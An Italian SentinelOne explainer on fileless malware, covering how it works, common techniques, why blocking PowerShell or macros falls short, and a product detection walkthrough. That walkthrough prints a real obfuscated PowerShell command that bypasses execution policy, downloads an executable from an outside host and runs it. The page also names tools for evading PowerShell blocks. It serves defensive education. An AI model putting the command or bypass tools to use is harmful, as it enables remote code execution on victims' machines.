Un leader nel Magic Quadrant™ Gartner® 2025 per la Protezione di Endpoints. Cinque anni di fila.Leader nel Magic Quadrant™ di Gartner®Leggi il report
La tua azienda è stata compromessa?Blog
IniziareContattaci
Header Navigation - IT
  • Piattaforma
    Panoramica della piattaforma
    • Singularity Platform
      Benvenuti nella Sicurezza Aziendale Integrata
    • Come funziona
      La Differenza di Singularity XDR
    • Marketplace di Singularity
      Integrazioni con un solo clic per sbloccare la potenza di XDR
    • Prezzi e Pacchetti
      Confronti e indicazioni in sintesi
    Data & AI
    • Purple AI
      Accelerare la SecOps con l'IA generativa
    • Singularity Hyperautomation
      Automatizzare facilmente i processi di sicurezza
    • AI-SIEM
      Il SIEM AI per il SOC autonomo
    • Singularity Data Lake
      Alimentato dall'IA, unificato dal lago di dati
    • Singularity Data Lake for Log Analytics
      Ingestione dei dati da ambienti on-premise, cloud o ibridi senza soluzione di continuità
    Endpoint Security
    • Singularity Endpoint
      Prevenzione, rilevamento e risposta autonoma
    • Singularity XDR
      Protezione, rilevamento e risposta nativa e aperta
    • Singularity RemoteOps Forensics
      Orchestrare l'analisi forense su larga scala
    • Singularity || Threat Intelligence
      Intelligence avversaria completa
    • Singularity Vulnerability Management
      Scoperta di risorse illecite
    Cloud Security
    • Singularity Cloud Security
      Bloccare gli attacchi con una CNAPP basata sull'IA
    • Singularity Cloud || Native Security
      Proteggere il cloud e le risorse di sviluppo
    • Singularity Cloud Workload Security
      Piattaforma di protezione del carico di lavoro del cloud in tempo reale
    • Singularity || Cloud Data Security
      Rilevamento delle minacce potenziato dall'intelligenza artificiale
    • Singularity Cloud Security Posture Management
      Rilevare e correggere le configurazioni errate del cloud
    Identity Security
    • Singularity Identity
      Rilevamento e risposta alle minacce per l'identità
  • Perché SentinelOne?
    Perché SentinelOne?
    • Perché SentinelOne?
      Cybersecurity per il futuro
    • I nostri Clienti
      Scelta dalle aziende leader nel mondo
    • Riconoscimenti dal mercato
      Testato e comprovato dagli esperti
    • Chi siamo
      Il leader del settore nella sicurezza informatica autonoma
    SentinelOne a confronto
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Settori Verticali
    • Energia
    • Governo Federale
    • Servizi Finanziari
    • Sanitario
    • Scuola Superiore
    • Istruzione Primaria e Secondaria
    • Manifatturiero
    • Retail
    • Settore pubblico statale e locale
  • Servizi
    Managed Services
    • Panoramica dei Managed Services
      Wayfinder Threat Detection & Response
    • Threat Hunting
      Competenza di livello mondiale e Threat Intelligence.
    • Managed Detection & Response
      MDR esperto 24/7/365 per tutto il tuo ambiente.
    • Incident Readiness & Response
      Digital Forensics, IRR e preparazione agli incidenti.
    Supporto, implementazione e igiene
    • Gestione tecnica dei clienti
      Customer Success con un servizio personalizzato
    • SentinelOne GO
      Consulenza per l'onboarding e l'implementazione
    • SentinelOne University
      Formazione live e on-demand
    • Panoramica dei Servizi
      Soluzioni complete per operazioni di sicurezza senza interruzioni
    • SentinelOne Community
      Community Login
  • Partner
    La Nostra Rete
    • Partner MSSP
      Successo più veloce con SentinelOne
    • Marketplace di Singularity
      Amplia la potenza della tecnologia SentinelOne
    • Partner specializzati nel Cyber Risk
      Ingaggiare i team per gestire le risposte agli incidenti
    • Alleanze Tecnologiche
      Soluzione aziendale integrata su larga scala
    • SentinelOne per AWS
      Ospitato nelle regioni AWS di tutto il mondo
    • Partner di canale
      Offriamo le soluzioni giuste, insieme
    Per saperne di più sul Programma→
  • Risorse
    Centro Risorse
    • Schede tecniche
    • eBook
    • Video
    • Whitepaper
    • Events
    Accedi a tutte le risorse→
    Blog
    • Riflettori puntati sulle funzionalità
    • Per CISO/CIO
    • Direttamente dalla prima linea
    • Identità
    • Cloud
    • macOS
    • Blog di SentinelOne
    Blog→
    Risorse Tecniche
    • SentinelLABS
    • Glossario del Ransomware
    • Cybersecurity 101
  • Chi siamo
    Informazioni su SentinelOne
    • Informazioni su SentinelOne
      Il leader di mercato nella sicurezza cyber
    • SentinelLABS
      Ricerche sulle minacce per il moderno Threat Hunter
    • Carriere
      Opportunità di lavoro
    • Stampa e notizie
      Annunci dell’azienda
    • Blog
      Tutto sulle minacce alla cyber security, le ultime notizie e molto altro
    • FAQ
      Ottieni risposte alle domande più frequenti
    • DataSet
      La Piattaforma dal vivo
    • S Foundation
      Garantire un futuro più sicuro per tutti
    • S Ventures
      Investire nella sicurezza e nei dati di prossima generazione
IniziareContattaci
Background image for Che cos'è il malware senza file? Come rilevarlo e prevenirlo?
Cybersecurity 101/Informazioni sulle minacce/Malware senza file

Che cos'è il malware senza file? Come rilevarlo e prevenirlo?

Il malware senza file opera senza i file tradizionali, rendendolo più difficile da rilevare. Comprendi le sue tattiche e come difenderti da questa minaccia in continua evoluzione.

CS-101_Threat_Intel.svg
Indice dei contenuti

Articoli correlati

  • Che cos'è il rilevamento e la risposta alle minacce (TDR)?
  • Cosa sono gli attacchi di forza bruta?
  • Che cos'è la resilienza informatica? Vantaggi e sfide
  • Che cos'è il malware polimorfico? Esempi e sfide
Aggiornato: July 29, 2025

Il malware senza file opera senza i file tradizionali, rendendone difficile il rilevamento. Questa guida esplora il funzionamento del malware senza file, i suoi metodi di infezione e i rischi che comporta per le organizzazioni.

Scoprite le strategie efficaci di rilevamento e prevenzione per combattere questa minaccia invisibile. Comprendere il malware senza file è fondamentale per migliorare le difese della sicurezza informatica.

Il rapporto SentinelOne H1 2018 Enterprise Risk Index Report mostra che gli attacchi basati su fileless sono aumentati del 94% tra gennaio e giugno. Gli attacchi PowerShell sono passati da 2,5 attacchi ogni 1.000 endpoint nel maggio 2018 a 5,2 attacchi ogni 1.000 endpoint nel mese di giugno.

Negli ultimi anni, gli autori delle minacce hanno sempre più spesso utilizzato malware senza file come alternativa altamente efficace.

Malware senza file - Immagine in primo piano | SentinelOne

Che cos'è il malware senza file?

Il malware senza file è un codice dannoso che non richiede l'uso di un file eseguibile sul file system dell'endpoint oltre a quelli già presenti. In genere viene iniettato in un processo in esecuzione e viene eseguito solo nella RAM. Ciò rende molto più difficile il rilevamento o la prevenzione da parte dei tradizionali software antivirus e di altri prodotti di sicurezza degli endpoint a rilevarlo o prevenirlo, a causa del basso impatto e dell'assenza di file da scansionare.

Un esempio che ha colpito Stati Uniti, Canada ed Europa è stata una campagna di spam lanciata dagli aggressori che ha diffuso documenti Word dannosi che, una volta aperti, eseguivano macro e installavano malware senza file. In casi come questo, il termine "fileless" si riferisce al fatto che gli aggressori sfruttano Windows PowerShell per caricare un file eseguibile direttamente nella memoria invece di scriverlo sul disco (dove può essere rilevato dai normali scanner antimalware).

Esistono molti altri modi per eseguire codice su un dispositivo senza utilizzare file eseguibili. Questi spesso utilizzano processi di sistema disponibili e considerati affidabili dal sistema operativo.

Alcuni esempi includono:

  • VBScript
  • JScript
  • File batch
  • PowerShell
  • Windows Management Instrumentation (WMI)
  • Mshta e rundll32 (o altri file firmati Windows in grado di eseguire codice dannoso)

Anche il malware nascosto nei documenti è un attacco basato su file

Oltre agli attacchi basati su file che utilizzano i file di sistema per eseguire codice dannoso, un altro tipo di attacco comune e considerato senza file è il malware nascosto nei documenti. Sebbene tali file di dati non siano autorizzati a eseguire codice, esistono vulnerabilità in Microsoft Office e nei lettori PDF che gli avversari possono sfruttare per ottenere l'esecuzione del codice. Ad esempio, un documento infetto potrebbe attivare un codice dannoso PowerShell. Esistono anche alcune funzionalità integrate che consentono l'esecuzione di codice all'interno dei documenti, come macro e attacco DDE.

Come funziona il malware senza file?

La forma più comune di malware senza file in circolazione è quella in cui la vittima clicca su un link spam contenuto in un'e-mail o in un sito web fraudolento.

Tale link o sito web carica quindi l'applicazione Flash e implementa un exploit pertinente al fine di infettare il computer dell'utente. Successivamente, il malware utilizza uno shellcode per eseguire un comando che gli consente di scaricare ed eseguire il payload esclusivamente all'interno della memoria.

Ciò significa che non rimane alcuna traccia della sua attività. A seconda degli obiettivi dell'hacker, il malware potrebbe compromettere dati sensibili, causare danni al computer della vittima o eseguire altre azioni dannose come il furto e la crittografia dei dati.

Gli hacker in genere si fingono una fonte affidabile o familiare per convincere la vittima a cliccare sul link che forniscono. Ciò è particolarmente efficace in contesti formali in cui la vittima crede che un dipendente o un dirigente della propria azienda la stia contattando.

Il punto chiave da ricordare è che questo tipo di attacco malware si basa sull'ingegneria sociale per avere successo.

Caratteristiche del malware senza file

Questo tipo di software dannoso utilizza programmi già presenti sul computer. Il suo comportamento non può essere rilevato dagli scanner euristici e non ha un codice o una firma identificabile.

Inoltre, il malware senza file risiede nella memoria del sistema.

Per funzionare, sfrutta i processi del sistema operativo infetto. Il malware senza file più avanzato può anche essere combinato con altri tipi di malware per facilitare attacchi informatici complessi. In determinate circostanze, può persino aggirare sia la whitelist che il sandboxing.

Fasi di un attacco malware senza file

Un attacco malware senza file è piuttosto unico nel suo funzionamento. Comprendere come opera può aiutare un'organizzazione a proteggersi da attacchi malware senza file in futuro. Esploriamo ciò che è necessario sapere.

1. Il malware ottiene l'accesso al computer

Prima che un autore di minacce sia in grado di portare a termine il proprio attacco malware, deve prima ottenere l'accesso al computer della vittima, spesso tramite un'e-mail di phishing o una tattica di ingegneria sociale. Dopo averlo fatto, può iniziare a implementare le fasi aggiuntive del processo.

Un altro modo per ottenere l'accesso al computer della vittima è attraverso credenziali compromesse. Rubando le credenziali, l'hacker può avere libero accesso al sistema e quindi utilizzare queste informazioni per accedere ad altri ambienti. Ad esempio, ottenere l'accesso iniziale al computer potrebbe non fornire all'hacker i privilegi di cui ha bisogno, ma potrebbe essere in grado di procurarsi le credenziali per ottenere questi dati.

2. Il programma stabilisce la persistenza

Dopo aver ottenuto l'accesso, il malware stabilisce una backdoor che consente all'hacker di accedere al computer a suo piacimento. Lo scopo principale di questa azione è evitare di perdere l'accesso al dispositivo in modo che la raccolta di informazioni possa continuare per lunghi periodi di tempo.

3. Esfiltrazione dei dati

La fase finale è l'esfiltrazione dei dati. Dopo che l'autore dell'attacco ha individuato le informazioni di cui ha bisogno, i dati vengono esfiltrati in un altro ambiente. Ciò consente loro di procurarsi dati sensibili senza essere rilevati per lunghi periodi di tempo e di lavorare in modo ripetibile tutte le volte che è necessario.

Tecniche comuni dei malware senza file

Una solida comprensione delle diverse tecniche vi aiuterà a imparare a riconoscere un attacco in futuro. Ecco sei tipi di malware che possono sfruttare le funzionalità senza file per migliorare la capacità di eludere il rilevamento:

1. Malware residente in memoria

Utilizzando lo spazio di memoria di un file Windows reale, gli aggressori possono caricare codice dannoso che rimane inattivo fino al momento dell'attivazione. L'aspetto senza file è che il software antivirus standard per la scansione dei file non è in grado di rilevare il malware.

Poiché i rootkit risiedono nel kernel piuttosto che in un file, hanno potenti capacità di eludere il rilevamento. Sono al 100% senza file, ma rientrano in questa categoria in quanto in continua evoluzione.

3. Malware del Registro di sistema di Windows

Come nell'esempio sopra citato, questi attacchi sfruttano il database del Registro di sistema di Windows che memorizza le impostazioni di basso livello per varie applicazioni. Il malware si basa su codice eseguito tramite un file, ma questo file è impostato per autodistruggersi dopo l'esecuzione, consentendo al malware di persistere come fileless.

4. Credenziali false

Come suggerisce il nome, questo attacco prevede l'utilizzo di credenziali compromesse di un utente legittimo (ovvero nome utente e password rubati). Dopo che l'hacker ha ottenuto l'accesso al sistema, implementa un shellcode per facilitare il proprio attacco alla macchina.

In casi estremi, può persino inserire codice nel registro di sistema per stabilire un accesso continuo al computer.

5. Ransomware senza file

Per chi non ha familiarità con questo tipo di malware, il ransomware è un programma dannoso che gli hacker utilizzano per estorcere denaro alle loro vittime. Spesso crittografano dati sensibili e minacciano di cancellarli a meno che non venga pagata una certa somma di denaro, spesso tramite criptovaluta.

quando si verifica questo tipo di attacco senza file, gli hacker possono attaccare mai scrivere sul disco del computer. rende difficile individuarlo finché non è troppo tardi.

6. Kit di exploit

Gli autori delle minacce utilizzano una serie di strumenti noti come exploit kit per sfruttare le vulnerabilità del computer della vittima. Questi attacchi iniziano generalmente come un tipico attacco malware senza file, il che significa che spesso convincono l'utente a cliccare su un link fraudolento.

Una volta che il programma è riuscito a infiltrarsi nel computer, l'exploit kit può eseguire una scansione del sistema per individuare le vulnerabilità da sfruttare e quindi elaborare una serie specifica di exploit da distribuire. Spesso il malware non viene rilevato e ottiene un accesso esteso al sistema e ai dati.

Il problema per le aziende

Uno dei motivi per cui il malware senza file è così interessante è che i prodotti di sicurezza non possono semplicemente bloccare i file di sistema o il software utilizzati in questo tipo di attacchi. Ad esempio, la manutenzione IT risentirebbe se un amministratore della sicurezza bloccasse PowerShell. Lo stesso vale per il blocco dei documenti Office o delle macro Office, che avrebbe probabilmente un impatto ancora maggiore sulla continuità aziendale.

L'impronta ridotta e la mancanza di eseguibili "estranei" da scansionare rendono difficile per gli antivirus tradizionali e altri prodotti di sicurezza degli endpoint rilevare o prevenire questo tipo di attacchi.

Il problema per i fornitori

Le aziende comprendono che la mancanza di una protezione efficace contro il malware senza file potrebbe rendere la loro organizzazione estremamente vulnerabile. Di conseguenza, i fornitori di sicurezza sono stati sottoposti a pressioni per affrontare questa minaccia crescente e hanno creato tutti i tipi di patch per rivendicare (o dimostrare) la loro copertura contro gli "attacchi senza file".

Sfortunatamente, molti di questi tentativi di risolvere il problema sono tutt'altro che ideali. Ecco alcune delle soluzioni standard e perché sono inadeguate:

Blocco di PowerShell

Come già detto, PowerShell è diventato uno strumento essenziale per i team IT e ha ampiamente sostituito il vecchio strumento cmd di Microsoft come utility di riga di comando predefinita. Bloccarlo causerebbe gravi interruzioni al lavoro dei team IT. Ancora più importante, dal punto di vista difensivo, bloccarlo sarebbe inutile: Esistono molte fonti pubbliche che spiegano come aggirare la politica di esecuzione di PowerShell e altri modi per utilizzarlo aggirando il blocco di PowerShell.exe. Per citarne alcuni:

  • Eseguire PowerShell solo con dll, con un semplice comando rundll32 utilizzando PowerShdll
  • Convertire gli script PowerShell in altri file EXE, con strumenti come PS2EXE
  • Utilizza malware che utilizza la propria copia di PowerShell.exe o modifica PowerShell locale per evitare il riconoscimento di PowerShell da parte dei prodotti di sicurezza
  • Incorporare uno script PowerShell nei pixel di un file PNG e generare una riga di comando per eseguirlo utilizzando Invoke-PSImage

Blocco dei file macro di MS Office

Per eliminare questo vettore di attacco, Microsoft ha aggiunto un'opzione per disabilitare le macro come impostazione del sito (a partire da Office 2016). Tuttavia, la maggior parte degli ambienti le consente ancora, quindi i fornitori di soluzioni di sicurezza hanno affrontato questo problema principalmente in due modi:

  • Bloccare le macro in modo generalizzato – questo impone le stesse restrizioni offerte da Microsoft alle organizzazioni che possono fare a meno delle macro
  • Estrazione del codice macro per analisi statiche o controlli di reputazione: questa soluzione può funzionare in alcuni casi. Tuttavia, lo svantaggio di questo approccio è che tale codice è estremamente difficile da classificare e rilevare con un tasso di falsi positivi tollerabile, specialmente per le macro dannose mai viste prima. Inoltre, esistono pochissimi repository di codice benigno e dannoso. Un'altra opzione è cercare le funzioni comuni tipicamente presenti negli attacchi, ma anche in questo caso si tratta di funzioni variabili e non ampiamente catalogate

Rilevamento lato server

Alcuni prodotti utilizzano solo il monitoraggio lato agente e prendono la decisione sul server o nel cloud. Questo approccio presenta gli stessi svantaggi di qualsiasi rilevamento che non avviene sull'endpoint. Principalmente, per funzionare, richiede connettività e la prevenzione è impossibile perché l'agente deve attendere la risposta del server prima di agire.

Come rilevare il malware senza file

Il malware senza file è una delle minacce più difficili da rilevare per i software antivirus tradizionali e i prodotti di sicurezza informatica legacy, perché può eludere i metodi di sicurezza legacy basati su firma, whitelist e sandboxing.

Un buon modo per proteggere la vostra organizzazione dal malware senza file è quello di avere un team di ricerca delle minacce che cerchi attivamente il malware.

Gli indicatori di attacco saranno mascherati e mescolati all'interno dell'ambiente di un'organizzazione. Ci sono vari modi in cui questo può manifestarsi in un sistema e occorre una profonda comprensione delle minacce per scoprire il malware senza file.

Comportamento, non identità

La chiave è osservare il comportamento dei processi in esecuzione sull'endpoint piuttosto che ispezionare i file presenti sul computer. Questo approccio è efficace perché, nonostante il numero elevato e crescente di varianti di malware, queste operano in modi molto simili. Il numero di comportamenti del malware è notevolmente inferiore al numero di modi in cui un file dannoso può presentarsi, rendendo questo approccio adatto alla prevenzione e al rilevamento.

Sebbene SentinelOne utilizzi più motori, tra cui IA statica e comportamentale, l'approccio comportamentale è estremamente efficace nel rilevare e prevenire questo tipo di attacchi perché è indipendente dal vettore di attacco.

L'efficacia di questo approccio è dimostrata da esempi come la campagna WannaCry, in cui SentinelOne è stata in grado di difendere i clienti prima che il ransomware fosse stato individuato in circolazione.

Migliorare l'intelligence sulle minacce

Scoprite come il servizio di caccia alle minacce WatchTower di SentinelOne può far emergere maggiori informazioni e aiutarvi a superare gli attacchi.

Per saperne di più

Come SentinelOne blocca il malware senza file

SentinelOne monitora tutte le attività sul lato agente a livello di kernel per distinguere tra attività dannose e innocue. Poiché l'agente dispone già del contesto completo (utenti, processi, argomenti della riga di comando, registro, file sul disco e comunicazioni esterne), qualsiasi attività dannosa può essere mitigata completamente. SentinelOne è in grado di annullare tutte le azioni dannose e consentire all'utente di lavorare su un dispositivo pulito.

In sostanza, SentinelOne consente di eliminare i costi nascosti legati alla pulizia della rete da codice dannoso, su tutta la rete.

Contenuto attivo

Per implementare questo approccio in modo efficace, SentinelOne utilizza il concetto di "StoryLine", che risolve il problema di attribuire la responsabilità alla causa principale dell'attività dannosa.

Ad esempio, supponiamo che un utente scarichi un allegato dannoso tramite Outlook, che poi tenta di crittografare i file sul disco. In questo scenario, attribuire la responsabilità e mettere in quarantena Outlook come processo padre significherebbe perdere di vista la vera fonte dell'attività dannosa. Outlook dovrebbe invece essere incluso come fonte di dati forensi da mostrare, ma non da mitigare. Tuttavia, è necessario mitigare l'intero gruppo di minacce, indipendentemente da eventuali file aggiuntivi rilasciati, chiavi di registro create o qualsiasi altro comportamento dannoso.

Utilizzando StoryLine ci consente di determinare la causa principale di un determinato flusso dannoso, con o senza un file, e di individuarne il responsabile, consentendo al cliente di gestire l'incidente in modo accurato.

SentinelOne Attack Storyline

Procedura dettagliata di rilevamento e mitigazione

Esaminiamo un flusso in cui l'utente ha ricevuto un documento Word tramite e-mail crittografata. L'utente conosce il mittente e, pertanto, scarica il documento sul proprio desktop e lo apre. Una volta aperto il file, ottiene quanto segue:

fileless malware popup

Una volta cliccato su "Sì", l'attacco ha inizio. Vediamo cosa rileva l'agente SentinelOne (in esecuzione in modalità Detect per questo esempio).

L'agente SentinelOne rileva run_me.docx

L'amministratore può esaminare esattamente in che modo ogni elemento coinvolto in questa storia ha contribuito all'attacco.

SentinelOne visualizza la riga di comando esatta che richiama il comando PowerShell:

-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:UsersadminAppDataRoaming.exE');START-proceSS 'C:UsersadminAppDataRoaming.exE'

In uno scenario reale, l'agente SentinelOne mitiga immediatamente il problema. Ciò avviene automaticamente, senza che l'amministratore debba intraprendere alcuna azione. L'amministratore viene avvisato tramite SMS, SIEM or email.

Conclusione

In definitiva, gli avversari sceglieranno sempre il percorso più breve per compromettere gli endpoint, al fine di ottenere il massimo rendimento con il minimo sforzo. Il malware senza file sta rapidamente diventando uno dei metodi più diffusi per farlo e, per prevenire tali attacchi, non è sufficiente bloccare operazioni essenziali come PowerShell. È qui che SentinelOne, basato sul rilevamento comportamentale AI e sulla sicurezza a più livelli, dà il meglio di sé, coprendo exploit, documenti macro, kit di exploit, PowerShell, PowerSploit e vulnerabilità zero day a livello locale senza influire sulla produttività quotidiana dei dipendenti.

Richiedi una demo e scopri di più su come SentinelOne può proteggerti dal malware senza file e dagli attacchi zero-day!

Domande frequenti sul malware senza file

Il malware senza file è un codice dannoso che opera nella memoria e non si basa su file memorizzati su disco. Abusa di strumenti legittimi come PowerShell o WMI per eseguire attacchi, lasciando poche o nessuna traccia che gli antivirus tradizionali possano rilevare. Gli aggressori lo utilizzano per evitare di essere rilevati e mantenere la persistenza fino a quando non ottengono ciò che vogliono.

Un'e-mail di phishing inserisce una macro dannosa in un documento Word. La macro esegue uno script PowerShell direttamente nella memoria, scarica payload e crea backdoor, il tutto senza salvare alcun file sul disco. L'attacco sfrutta processi di sistema affidabili, rendendo molto più difficile il rilevamento da parte degli strumenti di sicurezza standard.

Il malware senza file può rubare dati, distribuire ransomware, installare backdoor o dare agli aggressori il controllo completo dei sistemi. Poiché utilizza processi legittimi e raramente tocca il disco, è difficile da rilevare e può rimanere in memoria per lungo tempo, consentendo agli aggressori di mantenere l'accesso o di penetrare più a fondo nella rete.

Le tecniche comuni prevedono l'uso improprio di PowerShell, WMI, Registro di sistema di Windows e macro. Gli aggressori utilizzano l'iniezione DLL riflettente, script dannosi e binari living-off-the-land (LOLBin) per evitare di scrivere file.

Potrebbero utilizzare attività pianificate o exploit residenti in memoria, in modo che il payload scompaia dopo un riavvio o l'interruzione del processo.

È possibile monitorare attività sospette degli script, usi insoliti di PowerShell o WMI e anomalie della memoria. Le piattaforme di rilevamento e risposta degli endpoint (EDR) aiutano registrando l'attività della riga di comando e il comportamento dei processi. Presta attenzione a nuove attività pianificate, modifiche al registro e connessioni di rete inattese che potrebbero indicare operazioni senza file.

I sistemi potrebbero funzionare lentamente, mostrare processi sconosciuti nella memoria o generare traffico di rete anomalo. Potrebbero verificarsi attività PowerShell o WMI inattese, nuove attività pianificate o modifiche al registro. Gli antivirus tradizionali non rilevano granché, quindi è necessario cercare indizi comportamentali e instabilità del sistema.

Disattiva gli strumenti di scripting non necessari, limita i privilegi degli utenti e mantieni aggiornato tutto il software. Utilizza soluzioni EDR per monitorare l'utilizzo della memoria e degli script. Istruisci il tuo personale a non aprire e-mail o allegati sospetti.

Blocca le macro per impostazione predefinita e controlla regolarmente i tuoi sistemi per individuare comportamenti insoliti e connessioni di rete aperte.

Scopri di più su Informazioni sulle minacce

Che cos'è l'adware? Suggerimenti per il rilevamento e la prevenzioneInformazioni sulle minacce

Che cos'è l'adware? Suggerimenti per il rilevamento e la prevenzione

Questa guida approfondita spiega cos'è l'adware, fornendo definizioni, vie di infezione, metodi di rilevamento e consigli di prevenzione. Impara a rimuovere gli adware, proteggere i dispositivi e difendere le aziende dalle minacce degli adware.

Per saperne di più
Cosa sono gli indicatori di compromissione (IoC)?Informazioni sulle minacce

Cosa sono gli indicatori di compromissione (IoC)?

Gli indicatori di compromissione (IOC) aiutano a identificare le violazioni della sicurezza. Scopri come utilizzare gli IOC per un rilevamento e una risposta efficaci alle minacce.

Per saperne di più
Che cos'è un exploit nella sicurezza informatica?Informazioni sulle minacce

Che cos'è un exploit nella sicurezza informatica?

Comprendere e difendersi dagli exploit è fondamentale. Esplora i diversi tipi di exploit e le misure pratiche che puoi adottare per proteggere i tuoi sistemi da potenziali minacce.

Per saperne di più
Che cos'è l'ingegneria del rilevamento?Informazioni sulle minacce

Che cos'è l'ingegneria del rilevamento?

Questa guida spiega l'ingegneria di rilevamento, coprendone la definizione, lo scopo, i componenti chiave, le best practice, la rilevanza del cloud e il ruolo nel migliorare la visibilità e la protezione delle minacce in tempo reale.

Per saperne di più
  • Iniziare
  • Richiedi una demo
  • Presentazione del prodotto
  • Perché SentinelOne
  • Prezzi e Pacchetti
  • Contattaci
  • Contattaci
  • Supporto
  • SentinelOne Status
  • Lingua
  • Italiano
  • Piattaforma
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Servizi
  • Wayfinder TDR
  • SentinelOne GO
  • Gestione tecnica dei clienti
  • Servizi di Supporto
  • Settori Verticali
  • Energia
  • Governo Federale
  • Servizi Finanziari
  • Sanitario
  • Scuola Superiore
  • Istruzione Primaria e Secondaria
  • Manifatturiero
  • Retail
  • Settore pubblico statale e locale
  • Cybersecurity for SMB
  • Risorse
  • Blog
  • Labs
  • Video
  • Presentazione del prodotto
  • Events
  • Cybersecurity 101
  • eBooks
  • Stampa
  • Pers
  • Notizie
  • Glossario del Ransomware
  • Azienda
  • Chi siamo
  • I nostri clienti
  • Opportunità di Lavoro
  • Partner
  • Legale e conformità
  • Sicurezza e conformità
  • S Foundation
  • S Ventures

©2025 SentinelOne, Tutti i diritti riservati.

Informativa sulla privacy Condizioni di utilizzo